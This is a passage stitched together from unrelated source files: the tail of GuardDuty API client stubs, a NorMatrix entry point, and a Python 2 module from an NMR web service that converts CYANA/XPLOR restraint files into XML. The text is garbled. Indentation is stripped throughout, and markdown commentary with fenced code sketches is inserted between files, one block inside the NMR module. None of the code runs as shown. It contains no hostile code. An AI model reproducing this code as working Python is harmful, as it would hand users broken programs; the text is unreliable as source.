Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def unarchive_findings(DetectorId=None, FindingIds=None):
"""
Unarchives GuardDuty findings specified by the findingIds .
See also: AWS API Documentation
Exceptions
:example: response = client.unarchive_findings(
DetectorId='string',
FindingIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector associated with the findings to unarchive.\n
:type FindingIds: list
:param FindingIds: [REQUIRED]\nThe IDs of the findings to unarchive.\n\n(string) --\n\n
:rtype: dict
Returns
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def untag_resource(ResourceArn=None, TagKeys=None):
"""
Removes tags from a resource.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_resource(
ResourceArn='string',
TagKeys=[
'string',
]
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) for the resource to remove tags from.\n
:type TagKeys: list
:param TagKeys: [REQUIRED]\nThe tag keys to remove from the resource.\n\n(string) --\n\n
:rtype: dict
Returns
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def update_detector(DetectorId=None, Enable=None, FindingPublishingFrequency=None):
"""
Updates the Amazon GuardDuty detector specified by the detectorId.
See also: AWS API Documentation
Exceptions
:example: response = client.update_detector(
DetectorId='string',
Enable=True|False,
FindingPublishingFrequency='FIFTEEN_MINUTES'|'ONE_HOUR'|'SIX_HOURS'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector to update.\n
:type Enable: boolean
:param Enable: Specifies whether the detector is enabled.
:type FindingPublishingFrequency: string
:param FindingPublishingFrequency: An enum value that specifies how frequently findings are exported, such as to CloudWatch Events.
:rtype: dict
Returns
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def update_filter(DetectorId=None, FilterName=None, Description=None, Action=None, Rank=None, FindingCriteria=None):
"""
Updates the filter specified by the filter name.
See also: AWS API Documentation
Exceptions
:example: response = client.update_filter(
DetectorId='string',
FilterName='string',
Description='string',
Action='NOOP'|'ARCHIVE',
Rank=123,
FindingCriteria={
'Criterion': {
'string': {
'Eq': [
'string',
],
'Neq': [
'string',
],
'Gt': 123,
'Gte': 123,
'Lt': 123,
'Lte': 123,
'Equals': [
'string',
],
'NotEquals': [
'string',
],
'GreaterThan': 123,
'GreaterThanOrEqual': 123,
'LessThan': 123,
'LessThanOrEqual': 123
}
}
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that specifies the GuardDuty service where you want to update a filter.\n
:type FilterName: string
:param FilterName: [REQUIRED]\nThe name of the filter.\n
:type Description: string
:param Description: The description of the filter.
:type Action: string
:param Action: Specifies the action that is to be applied to the findings that match the filter.
:type Rank: integer
:param Rank: Specifies the position of the filter in the list of current filters. Also specifies the order in which this filter is applied to the findings.
:type FindingCriteria: dict
:param FindingCriteria: Represents the criteria to be used in the filter for querying findings.\n\nCriterion (dict) --Represents a map of finding properties that match specified conditions and values when querying findings.\n\n(string) --\n(dict) --Contains information about the condition.\n\nEq (list) --Represents the equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNeq (list) --Represents the not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGt (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGte (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLt (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLte (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\nEquals (list) --Represents an equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNotEquals (list) --Represents a not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGreaterThan (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGreaterThanOrEqual (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLessThan (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLessThanOrEqual (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\n\n\n\n\n\n\n\n
:rtype: dict
Returns
Response Syntax
{
'Name': 'string'
}
Response Structure
(dict) --
Name (string) --
The name of the filter.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Name': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def update_findings_feedback(DetectorId=None, FindingIds=None, Feedback=None, Comments=None):
"""
Marks the specified GuardDuty findings as useful or not useful.
See also: AWS API Documentation
Exceptions
:example: response = client.update_findings_feedback(
DetectorId='string',
FindingIds=[
'string',
],
Feedback='USEFUL'|'NOT_USEFUL',
Comments='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector associated with the findings to update feedback for.\n
:type FindingIds: list
:param FindingIds: [REQUIRED]\nThe IDs of the findings that you want to mark as useful or not useful.\n\n(string) --\n\n
:type Feedback: string
:param Feedback: [REQUIRED]\nThe feedback for the finding.\n
:type Comments: string
:param Comments: Additional feedback about the GuardDuty findings.
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def update_ip_set(DetectorId=None, IpSetId=None, Name=None, Location=None, Activate=None):
"""
Updates the IPSet specified by the IPSet ID.
See also: AWS API Documentation
Exceptions
:example: response = client.update_ip_set(
DetectorId='string',
IpSetId='string',
Name='string',
Location='string',
Activate=True|False
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe detectorID that specifies the GuardDuty service whose IPSet you want to update.\n
:type IpSetId: string
:param IpSetId: [REQUIRED]\nThe unique ID that specifies the IPSet that you want to update.\n
:type Name: string
:param Name: The updated name of the IPSet that you want to update.
:type Location: string
:param Location: The updated URI of the file that contains the IPSet.
:type Activate: boolean
:param Activate: The updated Boolean value that specifies whether the IPSet is active or not.
:rtype: dict
Returns
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def update_organization_configuration(DetectorId=None, AutoEnable=None):
"""
Updates the delegated administrator account with the values provided.
See also: AWS API Documentation
Exceptions
:example: response = client.update_organization_configuration(
DetectorId='string',
AutoEnable=True|False
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector to update the delegated administrator for.\n
:type AutoEnable: boolean
:param AutoEnable: [REQUIRED]\nIndicates whether to automatically enable member accounts in the organization.\n
:rtype: dict
Returns
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def update_publishing_destination(DetectorId=None, DestinationId=None, DestinationProperties=None):
"""
Updates information about the publishing destination specified by the destinationId .
See also: AWS API Documentation
Exceptions
:example: response = client.update_publishing_destination(
DetectorId='string',
DestinationId='string',
DestinationProperties={
'DestinationArn': 'string',
'KmsKeyArn': 'string'
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector associated with the publishing destinations to update.\n
:type DestinationId: string
:param DestinationId: [REQUIRED]\nThe ID of the publishing destination to update.\n
:type DestinationProperties: dict
:param DestinationProperties: A DestinationProperties object that includes the DestinationArn and KmsKeyArn of the publishing destination.\n\nDestinationArn (string) --The ARN of the resource to publish to.\n\nKmsKeyArn (string) --The ARN of the KMS key to use for encryption.\n\n\n
:rtype: dict
Returns:
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def update_threat_intel_set(DetectorId=None, ThreatIntelSetId=None, Name=None, Location=None, Activate=None):
"""
Updates the ThreatIntelSet specified by the ThreatIntelSet ID.
See also: AWS API Documentation
Exceptions
:example: response = client.update_threat_intel_set(
DetectorId='string',
ThreatIntelSetId='string',
Name='string',
Location='string',
Activate=True|False
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe detectorID that specifies the GuardDuty service whose ThreatIntelSet you want to update.\n
:type ThreatIntelSetId: string
:param ThreatIntelSetId: [REQUIRED]\nThe unique ID that specifies the ThreatIntelSet that you want to update.\n
:type Name: string
:param Name: The updated name for the ThreatIntelSet.
:type Location: string
:param Location: The updated URI of the file that contains the ThreatIntelSet.
:type Activate: boolean
:param Activate: The updated Boolean value that specifies whether the ThreatIntelSet is active or not.
:rtype: dict
Returns:
Response Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
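These four `update_*` stubs share one calling convention: two required identifiers plus optional fields that are simply omitted when not supplied. A minimal sketch of assembling the request parameters for `update_ip_set` (the detector ID, IPSet ID, and S3 URL below are placeholders for illustration, not real resources):

```python
def build_update_ip_set_params(detector_id, ip_set_id, name=None,
                               location=None, activate=None):
    """Collect only the parameters that were actually supplied,
    mirroring how optional arguments are left out when None."""
    params = {"DetectorId": detector_id, "IpSetId": ip_set_id}
    optional = {"Name": name, "Location": location, "Activate": activate}
    params.update({k: v for k, v in optional.items() if v is not None})
    return params


# Placeholder IDs for illustration only.
params = build_update_ip_set_params(
    "12abc34d567e8fa901bc2d34e56789f0",
    "example-ipset-id",
    location="https://s3.amazonaws.com/example-bucket/ip-list.txt",
    activate=True,
)
```

The same pattern applies to `update_threat_intel_set` and the other stubs: required keys are always present, optional keys appear only when given.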
# File: src/normatrix/__main__.py (Saverio976/NorMatrix, MIT license)
try:
from normatrix.source.main import main
except ModuleNotFoundError:
from src.normatrix.source.main import main
main()
# File: webenmr/lib/amber_checks.py (andreagia/WEBNMR, Apache-2.0 license)
from lxml import etree
import os
import math
from pyparsing import *
import webenmr.lib.cnvx as cnvx
#import amber_md.lib.cnvpx as cnvpx
import webenmr.lib.cnvdx as cnvdx
from pylons import config, session
def check_noe_d_cyana(xmlin, cyana):
print "#######XML_NOE_CYANA################"
print etree.tostring(xmlin, pretty_print=True)
print "####################################"
lol = False
for elt in xmlin.getiterator():
if elt.tag == "noe":
f_noe = elt.get('filename')
ini_num = elt.get('number')
if elt.get('lol') == "False":
lol = False
elif elt.get('lol') == "True":
lol = True
else:
lol = False
if elt.get('nocorr') == "False":
nocorr = False
elif elt.get('nocorr') == "True":
nocorr = True
print f_noe
#check if NOE is Lower Limits
#if f_noe.split(".")[-1] == "lol":
# lol = True
noe_in = os.path.join(config['app_conf']['amber_data'],session.get('DIR_CACHE'), f_noe)
xxx = open(noe_in,"r").readlines()
#if os.path.exists(noe_in):
# os.remove(noe_in)
root = etree.Element("noe")
if lol:
etree.SubElement(root, "lol").text = "True"
else:
etree.SubElement(root, "lol").text = "False"
for t in xxx:
if len(t) > 0:
sd = t.split("#")[0].replace(">","").replace("<","")
sf = sd.split()
if len(sf) == 2 and sf[0].isdigit():
resnu1 = sf[0]
resna1 = sf[1]
if len(sf) >= 5 and not sf[0].isdigit():
if sf[1].isdigit():
atm1 = sf[0]
resnu2 = sf[1]
resna2 = sf[2]
atm2 = sf[3]
if atm1[0] == "Q" and atm1[1] != "Q":
atm1 = "H"+atm1[1:]+"#"
# moved to cnvx.py
#if atm1[0] == "Q" and atm1[1] == "Q":
#if resna1 == "LEU":
#atm1 = "CG"
#if resna1 == "VAL":
#atm1 = "CB"
if atm2[0] == "Q" and atm2[1] != "Q":
atm2 = "H"+atm2[1:]+"#"
# moved to cnvx.py
#if atm2[0] == "Q" and atm2[1] == "Q":
#if resna2 == "LEU":
#atm2 = "CG"
#if resna2 == "VAL":
#atm2 = "CB"
val = sf[4]
print resnu1,resna1,atm1,resnu2,resna2,atm2,val
sel = etree.SubElement(root, "selection")
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu1
etree.SubElement(sel1, "name").text = atm1
sel2 = etree.SubElement(sel, "sel2")
etree.SubElement(sel2, "resid").text = resnu2
etree.SubElement(sel2, "name").text = atm2
dist = etree.SubElement(sel, "D")
etree.SubElement(dist, "D").text = val
etree.SubElement(dist, "D_minus").text = str(float(val) - 1.8)
etree.SubElement(dist, "D_plus").text = "0"
if len(sf) >= 7 and sf[0].isdigit():
print "7"
print sd
if sf[3].isdigit():
sel = etree.SubElement(root, "selection")
resnu1 = sf[0]
resna1 = sf[1]
atm1 = sf[2]
resnu2 = sf[3]
resna2 = sf[4]
atm2 = sf[5]
val = sf[6]
# moved to cnvx.py
#if atm1[0] == "Q" and atm1[1] == "Q":
# if resna1 == "LEU":
# atm1 = "CG"
# if resna1 == "VAL":
# atm1 = "CB"
if atm1[0] == "Q" and atm1[1] != "Q":
atm1 = "H"+atm1[1:]+"#"
if atm1[0] == "Q" and atm1[1] == "R":
atm1 = "H"+atm1[1:]+"$"
# moved to cnvx.py
#if atm2[0] == "Q" and atm2[1] == "Q":
# if resna2 == "LEU":
# atm2 = "CG"
# if resna2 == "VAL":
# atm2 = "CB"
if atm2[0] == "Q" and atm2[1] != "Q":
atm2 = "H"+atm2[1:]+"#"
if atm2[0] == "Q" and atm2[1] == "R":
atm2 = "H"+atm2[1:]+"$"
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu1
etree.SubElement(sel1, "name").text = atm1
sel2 = etree.SubElement(sel, "sel2")
etree.SubElement(sel2, "resid").text = resnu2
etree.SubElement(sel2, "name").text = atm2
dist = etree.SubElement(sel, "D")
etree.SubElement(dist, "D").text = val
etree.SubElement(dist, "D_minus").text = "0"
etree.SubElement(dist, "D_plus").text = "0"
#print etree.tostring(root, pretty_print=True)
pdb_out = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "out_leap.pdb")
pdb_ref_n = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "pdb.ref")
#
#xml_file = os.path.join(config['app_conf']['amber_data'],session.get('DIR_CACHE'), "xml_noe")
#xml_file_w = open(xml_file, 'w')
#xml_file_w.write()
#xml_file_w.close()
print pdb_out
print pdb_ref_n
print etree.tostring(root, pretty_print=True)
#nocorr = 0
[ resu_vx, rst ]= cnvx.convert(root, ini_num, pdb_out, pdb_ref_n, nocorr)
noe_out_rst = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_noe + "_noe_RST")
print noe_out_rst
noe_out_rst_file = open(noe_out_rst, 'w')
noe_out_rst_file.writelines(rst)
noe_out_rst_file.close()
return resu_vx
def check_dih_d_cyana(xmlin, cyana):
print "XML DIH INPUT"
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "dihedral":
f_dih = elt.get('filename')
ini_num = elt.get('number')
print f_dih
noe_in = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_dih)
xxx = open(noe_in,"r").readlines()
#if os.path.exists(noe_in):
# os.remove(noe_in)
root = etree.Element("dih")
for t in xxx:
if len(t) > 0:
sd = t.split("#")[0].replace(">","").replace("<","")
sf = sd.split()
print sf
if len(sf) >= 4 :
if sf[0].isdigit():
sel = etree.SubElement(root, "selection")
resnu = sf[0]
resna = sf[1]
ang = sf[2]
ang1 = sf[3]
ang2 = sf[4]
ang_ok = False
# atom assignments for each angle follow the cyana/dyana library, per residue type
if ang == "PHI":
atm1 = "C"
atm2 = "N"
atm3 = "CA"
atm4 = "C"
resnu1 = str(int(resnu) - 1)
resnu2 = resnu
ang_ok = True
if ang == "PSI":
atm1 = "N"
atm2 = "CA"
atm3 = "C"
atm4 = "N"
resnu1 = resnu
resnu2 = str(int(resnu) + 1)
ang_ok = True
#chi1_rn = ["ALA","ILE","VAL","CYS","SER"]
if ang == "CHI1":
if resna[0:3] == "ILE" or resna[0:3] == "VAL":
atm1 = "N"
atm2 = "CA"
atm3 = "CB"
atm4 = "CG1"
elif resna[0:3] == "SER":
atm1 = "N"
atm2 = "CA"
atm3 = "CB"
atm4 = "OG"
elif resna[0:3] == "THR":
atm1 = "N"
atm2 = "CA"
atm3 = "CB"
atm4 = "OG1"
elif resna[0:3] == "CYS":
atm1 = "N"
atm2 = "CA"
atm3 = "CB"
atm4 = "SG"
else:
atm1 = "N"
atm2 = "CA"
atm3 = "CB"
atm4 = "CG"
resnu1 = resnu
resnu2 = resnu
ang_ok = True
if ang == "CHI2":
if resna[0:3] == "ARG" or resna[0:3] == "GLN" or resna[0:3] == "GLU" or resna[0:3] == "LYS":
atm1 = "CA"
atm2 = "CB"
atm3 = "CG"
atm4 = "CD"
elif resna[0:3] == "ASN" or resna[0:3] == "ASP":
atm1 = "CA"
atm2 = "CB"
atm3 = "CG"
atm4 = "OD1"
elif resna[0:3] == "CYS":
atm1 = "CA"
atm2 = "CB"
atm3 = "SG"
atm4 = "HG"
elif resna[0:2] == "HI":
atm1 = "CA"
atm2 = "CB"
atm3 = "CG"
atm4 = "ND1"
elif resna[0:3] == "LEU" or resna[0:3] == "PHE" or resna[0:3] == "TRP" or resna[0:3] == "TYR":
atm1 = "CA"
atm2 = "CB"
atm3 = "CG"
atm4 = "CD1"
elif resna[0:3] == "MET":
atm1 = "CA"
atm2 = "CB"
atm3 = "CG"
atm4 = "SD"
resnu1 = resnu
resnu2 = resnu
ang_ok = True
if ang_ok:
ran1 = math.radians(float(ang1))
ran2 = math.radians(float(ang2))
rand = (ran2 - ran1)/2
ranf = ran1 + rand
attri_ang = {}
attri_ang["angle"] = ang
attri_ang["res"] = resna[0:3]
type = etree.SubElement(sel, "cyana", attrib = attri_ang)
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu1
etree.SubElement(sel1, "name").text = atm1
sel2 = etree.SubElement(sel, "sel2")
etree.SubElement(sel2, "resid").text = resnu
etree.SubElement(sel2, "name").text = atm2
sel3 = etree.SubElement(sel, "sel3")
etree.SubElement(sel3, "resid").text = resnu
etree.SubElement(sel3, "name").text = atm3
sel4 = etree.SubElement(sel, "sel4")
etree.SubElement(sel4, "resid").text = resnu2
etree.SubElement(sel4, "name").text = atm4
dist = etree.SubElement(sel, "angle")
etree.SubElement(dist, "C").text = "1"
etree.SubElement(dist, "ang").text = "%6.2f" % math.degrees(ranf)
etree.SubElement(dist, "d_ang").text = "%6.2f" % math.degrees(rand)
etree.SubElement(dist, "exp").text = "2"
else:
attri_ang = {}
attri_ang["angle"] = ang
attri_ang["ERROR"] = "Angle not found"
etree.SubElement(sel, "cyana", attrib = attri_ang)
#print etree.tostring(root, pretty_print=True)
pdb_out = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "out_leap.pdb")
pdb_ref_n = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "pdb.ref")
#
#xml_file = os.path.join(config['app_conf']['amber_data'],session.get('DIR_CACHE'), "xml_noe")
#xml_file_w = open(xml_file, 'w')
#xml_file_w.write()
#xml_file_w.close()
print pdb_out
print pdb_ref_n
print etree.tostring(root, pretty_print=True)
nocorr = 0
[ resu_vx, rst ]= cnvdx.convert(root, ini_num, pdb_out, pdb_ref_n, nocorr)
print rst
dih_out_rst = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_dih + "_dih_RST")
print dih_out_rst
dih_out_rst_file = open(dih_out_rst, 'w')
dih_out_rst_file.writelines(rst)
dih_out_rst_file.close()
return resu_vx
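The bound handling in `check_dih_d_cyana` reduces to taking the midpoint and half-width of the CYANA angle range; the radians round-trip above is numerically equivalent to working in degrees directly. A standalone sketch of the same arithmetic:

```python
import math


def cyana_range_to_center(ang1, ang2):
    """Return (center, half_width) in degrees for a CYANA lower/upper
    angle bound, reproducing the conversion used above."""
    ran1 = math.radians(float(ang1))
    ran2 = math.radians(float(ang2))
    rand = (ran2 - ran1) / 2.0
    return math.degrees(ran1 + rand), math.degrees(rand)


center, half = cyana_range_to_center(-90.0, -30.0)  # e.g. a PHI restraint
```

For the example range -90..-30 this yields a center of -60 degrees with a half-width of 30, which is what gets written into the `ang`/`d_ang` elements.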
def check_pcs_xplor(xmlin):
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "pcs":
f_pcs = elt.get('filename')
ini_num = elt.get('number')
#nocorr = elt.get('nocorr')
nocorr = 0
print f_pcs
pcs_in = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_pcs )
#if os.path.exists(pcs_in):
# os.remove(pcs_in)
LPAR, RPAR, LBRK, RBRK, LBRC, RBRC, VBAR = map(Suppress, "()[]{}|")
bytes = Word(printables)
assi = Suppress(Regex(r"[aA][sS][sS][iI][a-z A-Z]*[a-z A-Z]*")).setResultsName("selection")
num = Word(nums+"."+"-")
numf = Group( num.setResultsName("val_pcs") + num.setResultsName("tol") ).setResultsName("values")
word = Word(alphanums+'"*#+%\'')
sand = Regex(r"[aA][nN][dD]")
sor = Regex(r"[oO][rR]")
cond = Suppress(sand | sor)
name = Suppress(Regex(r"[nN][aA][mM][eE]")) + Word(alphanums+'"*#+%\'').setResultsName("name")
resid = Suppress(Regex(r"[rR][eE][sS][iI][a-z A-Z]*")) + Word(nums).setResultsName("resid")
seidvoid = Literal('" "')
seidn = Group('"' + word + '"')
seid = seidvoid | seidn
#seid = ZeroOrMore(Word(alphanums+'"*#+% ') )
segid = Suppress(Regex(r"[sS][eE][gG][iI]*[a-z A-Z]") + seid)
trash = Suppress(LBRC + word + RBRC)
simpleString1 = Optional(segid) + Optional(cond) + resid + cond + Optional(name) + Optional(cond)
simpleString2 = OneOrMore(name + Optional(cond) )
simpleString = simpleString1 | simpleString2
display = LBRK + simpleString + RBRK
string_ = Optional(display) + simpleString
sexp = Forward()
sexpList = Group(LPAR + ZeroOrMore(sexp) + RPAR)
sexp << ( string_ | sexpList )
pr = assi + Optional(trash) + sexp + sexp + sexp + sexp + sexp.setResultsName("sel1") + numf
file = open(pcs_in,"r")
file_r = []
for i in file:
file_r.append(i.split('!')[0])
#file_r = file.readlines()
xxx = ''.join(i for i in file_r)
#print xxx
sexpr = pr.searchString(xxx)
#pprint.pprint(sexpr.asList())
def remove_item(xml):
# remove XML entries produced by nested brackets
join_char=''
for i in xml.splitlines():
if not ("<ITEM>" in i or "</ITEM>" in i):
#print i
join_char += i + "\n"
return join_char
xml_pcs = etree.fromstring(remove_item(sexpr.asXML("pcs")))
pdb_out = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "out_leap.pdb")
pdb_ref_n = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "pdb.ref")
xml_file = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_pcs+".xml")
xml_file_w = open(xml_file, 'w')
xml_file_w.write(remove_item(sexpr.asXML("pcs")))
xml_file_w.close()
#print pdb_out
#print pdb_ref_n
print etree.tostring(xml_pcs, pretty_print=True)
return remove_item(sexpr.asXML("pcs"))
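The nested `remove_item` helper exists because pyparsing's `asXML` wraps repeated groups in `<ITEM>` tags that would break the flat structure expected downstream; a standalone illustration of the same line filter on a tiny sample document:

```python
def remove_item(xml):
    """Drop every line carrying a pyparsing <ITEM> wrapper tag."""
    join_char = ""
    for line in xml.splitlines():
        if not ("<ITEM>" in line or "</ITEM>" in line):
            join_char += line + "\n"
    return join_char


sample = "<pcs>\n<ITEM>\n<resid>10</resid>\n</ITEM>\n</pcs>"
cleaned = remove_item(sample)
```

After filtering, `cleaned` contains only the `<pcs>` wrapper and its payload lines, so `etree.fromstring` can parse it.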
def check_pcs_d_cyana(xmlin, cyana):
print "XML PCS INPUT"
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "pcs":
f_pcs = elt.get('filename')
ini_num = elt.get('number')
print "file pcs input"
print f_pcs
print cyana
pcs_in = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_pcs)
xxx = open(pcs_in,"r").readlines()
#if os.path.exists(noe_in):
# os.remove(noe_in)
root = etree.Element("pcs")
for t in xxx:
if len(t) > 0:
sd = t.split("#")[0].replace(">","").replace("<","")
sf = sd.split()
print sf
if not cyana:
if len(sf) >= 4 :
atmnf = 0
if sf[0].isdigit():
sel = etree.SubElement(root, "selection")
resnu = sf[0]
resna = sf[1]
atm1 = sf[2]
val_pcs = sf[3]
tol = sf[4]
weight = sf[5]
tens = sf[6]
if atm1 == "H":
atm2 = "N"
elif atm1 == "HN":
atm2 = "N"
elif atm1 == "HA":
atm2 = "CA"
else:
atmnf = 1
print "ATOM %s with no listed attached atom" % atm1
if atmnf == 0:
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu
etree.SubElement(sel1, "name").text = atm1
sel2 = etree.SubElement(sel, "sel2")
etree.SubElement(sel2, "resid").text = resnu
etree.SubElement(sel2, "name").text = atm2
dist = etree.SubElement(sel, "values")
etree.SubElement(dist, "val_pcs").text = val_pcs
etree.SubElement(dist, "tol").text = tol
# Format copied from the cyana source code
#C ------------------------------------------------------------------
#C GETDIP: reads a file containing the pseudocontact shift
#C constraints.
#C Format is:
#C
#C I3,1X,2A5,1X,F7.2,1X,I1,A1,f5.2,1x,f5.2,1x,I2
#C
#C that corresponds to:
#C
#C IRESDIP() residue number;
#C NAMRESDIP() residue name;
#C NAMATDIP() atom name;
#C PSHIFTOR() pseudocontact shift (original);
#C QQDIA if letter 'd' the averaged experimental shift is compared
#C to the averaged experimental shift (in this case weight
#C is doubled);
#C NPROT() number of atoms whose calculated shifts must be averaged;
#C TOLPROT() tolerance on calculated shift;
#C WPROT() weight of the individual contraints (multiplies wdip).
#C
#C
#C Mauro A. Cremonini 24/01/95
#C Mauro A. Cremonini 07/02/96
#C
#C
#C NUTE() index counting the different tensors
if cyana:
if len(sf) >= 7 :
atmnf = 0
if sf[0].isdigit():
sel = etree.SubElement(root, "selection")
resnu = sf[0]
resna = sf[1]
atm1 = sf[2]
val_pcs = sf[3]
molatm = sf[4]
tol = sf[5]
weight = sf[6]
if atmnf == 0:
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu
etree.SubElement(sel1, "name").text = atm1
dist = etree.SubElement(sel, "values")
etree.SubElement(dist, "val_pcs").text = val_pcs
etree.SubElement(dist, "molatm").text = molatm
etree.SubElement(dist, "tol").text = tol
etree.SubElement(dist, "weight").text = weight
print etree.tostring(root, pretty_print=True)
xml_pcs = etree.tostring(root, pretty_print=True)
xml_file = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_pcs+".xml")
xml_file_w = open(xml_file, 'w')
xml_file_w.write(xml_pcs)
xml_file_w.close()
return xml_pcs
def check_rdc_d_cyana(xmlin, cyana):
print "XML DIH INPUT"
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "rdc":
f_rdc = elt.get('filename')
ini_num = elt.get('number')
print "file rdc input"
print f_rdc
print cyana
rdc_in = os.path.join(config['app_conf']['amber_data'],session.get('DIR_CACHE'), f_rdc)
xxx = open(rdc_in,"r").readlines()
#if os.path.exists(noe_in):
# os.remove(noe_in)
root = etree.Element("rdc")
for t in xxx:
if len(t) > 0:
sd = t.split("#")[0].replace(">","").replace("<","")
sf = sd.split()
print sf
if not cyana:
if len(sf) >= 4 :
atmnf = 0
if sf[0].isdigit():
sel = etree.SubElement(root, "selection")
resnu = sf[0]
resna = sf[1]
atm1 = sf[2]
val_rdc = sf[3]
tol = sf[4]
weight = sf[5]
if len(sf) >= 7 :
tens = sf[6]
else:
tens = ""
if atm1 == "H":
atm2 = "N"
elif atm1 == "HN":
atm2 = "N"
elif atm1 == "HA":
atm2 = "CA"
else:
atmnf = 1
print "ATOM %s with no listed attached atom" % atm1
if atmnf == 0:
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu
etree.SubElement(sel1, "name").text = atm2
sel2 = etree.SubElement(sel, "sel2")
etree.SubElement(sel2, "resid").text = resnu
etree.SubElement(sel2, "name").text = atm1
dist = etree.SubElement(sel, "values")
etree.SubElement(dist, "val_rdc").text = val_rdc
etree.SubElement(dist, "tol").text = tol
if cyana:
if len(sf) >= 8 :
atmnf = 0
if sf[0].isdigit():
sel = etree.SubElement(root, "selection")
resnu1 = sf[0]
atm1 = sf[1]
resnu2 = sf[2]
atm2 = sf[3]
val_rdc = sf[4]
tol = sf[5]
weight = sf[6]
point = sf[7]
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu1
etree.SubElement(sel1, "name").text = atm1
sel2 = etree.SubElement(sel, "sel2")
etree.SubElement(sel2, "resid").text = resnu2
etree.SubElement(sel2, "name").text = atm2
dist = etree.SubElement(sel, "values")
etree.SubElement(dist, "val_rdc").text = val_rdc
etree.SubElement(dist, "tol").text = tol
etree.SubElement(dist, "weight").text = weight
etree.SubElement(dist, "point").text = point
print etree.tostring(root, pretty_print=True)
xml_rdc = etree.tostring(root, pretty_print=True)
xml_file = os.path.join(config['app_conf']['amber_data'],session.get('DIR_CACHE'), f_rdc+".xml")
xml_file_w = open(xml_file, 'w')
xml_file_w.write(xml_rdc)
xml_file_w.close()
return xml_rdc
